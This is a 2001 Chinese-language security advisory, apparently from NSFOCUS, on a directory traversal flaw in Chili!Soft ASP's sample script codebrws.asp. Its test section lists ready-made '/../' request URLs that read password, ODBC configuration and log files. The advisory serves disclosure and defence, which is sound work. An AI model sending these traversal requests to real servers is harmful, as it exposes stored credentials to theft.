首页 -> 安全研究

安全研究

安全漏洞
Chili!Soft ASP 例子脚本目录遍历漏洞

发布日期:2001-03-01
更新日期:2001-03-01

受影响系统:

Chilisoft ChiliSoft ASP for Linux 3.5.2
ChiliSoft ChiliSoft ASP for Linux 3.5
ChiliSoft ChiliSoft ASP for Linux 3.0
描述:

BUGTRAQ ID: 2407
  
Chili!Soft ASP 提供一个名为 codebrws.asp 的例子脚本,它缺省位于 /opt/casp/caspsamp
目录。这个脚本存在的漏洞使得攻击者可以遍历目录。

通过向有漏洞的脚本提交包含 '/../' 序列的请求。远程攻击者可以强迫脚本读取并显示普通目
录树之外的文件的内容。这将使得攻击者可以读取 /opt/casp 目录中的文件,包括存有诸如数
据库的用户名和口令、服务日志、管理界面的用户名和口令等敏感信息的文件。


<* 来源:Stan Bubrouski (stan@ccs.neu.edu) *>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


在浏览器中输入如下形式的 URL:

  http://<server>/caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd
  http://<server>/caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini
  http://<server>/caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server
  http://<server>/caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC
  http://<server>/caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000


建议:

临时解决办法:

   NSFOCUS建议用某种方法拒绝对 codebrws.asp 的请求,或者除非非要用它,干脆删除这
   个脚本。

厂商补丁:

   暂无



浏览次数:5501
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障